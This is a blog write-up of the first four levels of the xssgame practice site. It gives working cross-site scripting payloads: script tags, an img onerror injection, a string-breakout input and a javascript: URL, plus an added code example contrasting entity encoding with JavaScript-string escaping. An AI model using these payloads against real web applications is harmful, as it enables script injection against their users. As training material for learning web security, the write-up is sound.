Jirairya

xssgame

2017-07-05

I spent some time playing xssgame.

Some XSS cheat sheet links:

  • https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
  • http://brutelogic.com.br/blog/cheat-sheet/
  • http://teamultimate.in/xss-cheat-sheet-waf-filter-bypass/

Level 1

Level 1 URL: http://www.xssgame.com/m4KKGHi2rVUN

Solution:

<script>alert(1);</script>

Level cleared.

Level 2

Level 2 URL: http://www.xssgame.com/WrfpuKFX8GNr

First, inject:

<img src='test' onerror='alert("1")'>

Viewing the page source shows:

<img id="loading" src="/static/img/loading.gif" style="width: 50%" onload="startTimer('&lt;img src=&#39;test&#39; onerror=&#39;alert(&#34;1&#34;)&#39;&gt;');" />

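This shows that the input ends up inside the JavaScript string argument of startTimer() in the onload handler, so code can be injected: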

'-alert(1)-'

Level cleared.
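Why the entity-encoded output in the Level 2 source was still injectable, and what context-aware escaping changes, as an added example (not the game's code and not from the original post). It assumes the server builds the handler as startTimer('<input>'); all function names are hypothetical, and alert/startTimer are stubs so the script runs in Node.

```javascript
// Added illustration: all function names here are hypothetical, not the game's code.

// HTML-entity encoding only, like the output seen in the Level 2 page source.
const htmlEncode = s => s.replace(/[&<>"']/g, c => '&#' + c.charCodeAt(0) + ';');

// What the HTML parser does to an attribute value before the handler text
// reaches the JavaScript engine (numeric entities only, enough for this demo).
const htmlDecode = s => s.replace(/&#(\d+);/g, (_, n) => String.fromCharCode(Number(n)));

// JavaScript-string escaping: every non-alphanumeric code unit becomes \uXXXX,
// so no quote, backslash or line break can end the string literal.
const jsStringEscape = s => s.replace(/[^A-Za-z0-9]/g,
  c => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));

// Handler text as the server would emit it into onload="...".
const renderWeak = input => "startTimer('" + htmlEncode(input) + "');";
const renderHardened = input => "startTimer('" + htmlEncode(jsStringEscape(input)) + "');";

// Decode the attribute, then run it with stubbed startTimer/alert and record
// what happened. A SyntaxError means the input broke the script without running.
function runHandler(attrValue) {
  const seen = { timerArgs: [], alerts: 0, syntaxError: false };
  const startTimer = v => { seen.timerArgs.push(v); };
  const alert = () => { seen.alerts += 1; return 0; };
  try {
    new Function('startTimer', 'alert', htmlDecode(attrValue))(startTimer, alert);
  } catch (e) {
    if (!(e instanceof SyntaxError)) throw e;
    seen.syntaxError = true;
  }
  return seen;
}

// The two inputs tried on the page.
const inputs = ['<img src=\'test\' onerror=\'alert("1")\'>', "'-alert(1)-'"];
for (const input of inputs) {
  console.log(input);
  console.log('  entity-encoded only:', JSON.stringify(runHandler(renderWeak(input))));
  console.log('  JS-escaped + encoded:', JSON.stringify(runHandler(renderHardened(input))));
}
```

With entity encoding alone the second input calls the stubbed alert once; with JavaScript-string escaping applied first, startTimer receives the input as plain text and alert is never called.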

Level 3

Level 3 URL: http://www.xssgame.com/u0hrDTsXmyVJ

From the page source:

function chooseTab(name) {
  // Only this first use of name goes through parseInt()
  var html = "Cat " + parseInt(name) + "<br>";
  // Here the raw name is concatenated into the markup unescaped
  html += "<img src='/static/img/cat" + name + ".jpg' />";

  document.getElementById('tabContent').innerHTML = html;

  // Select the current tab
  var tabs = document.querySelectorAll('.tab');
  for (var i = 0; i < tabs.length; i++) {
    if (tabs[i].id == "tab" + parseInt(name)) {
      tabs[i].className = "tab active";
    } else {
      tabs[i].className = "tab";
    }
  }

  window.location.hash = name;

  // Tell parent we've changed the tab
  top.postMessage({'url': self.location.toString()}, "*");
}

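The image is switched by changing the image id. If it is changed to an id that does not exist, the image fails to load and the onerror event can be used to trigger alert():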

#1'onerror=alert(1)>

Level cleared.

Level 4

Level 4 URL: http://www.xssgame.com/__58a1wgqGgI

On the page shown after a successful sign-up, replacing welcome in the redirect link with javascript:alert(1) clears the level:

javascript:alert(1)

Level cleared.

I only got as far as level 4; I will continue with the rest when I have time…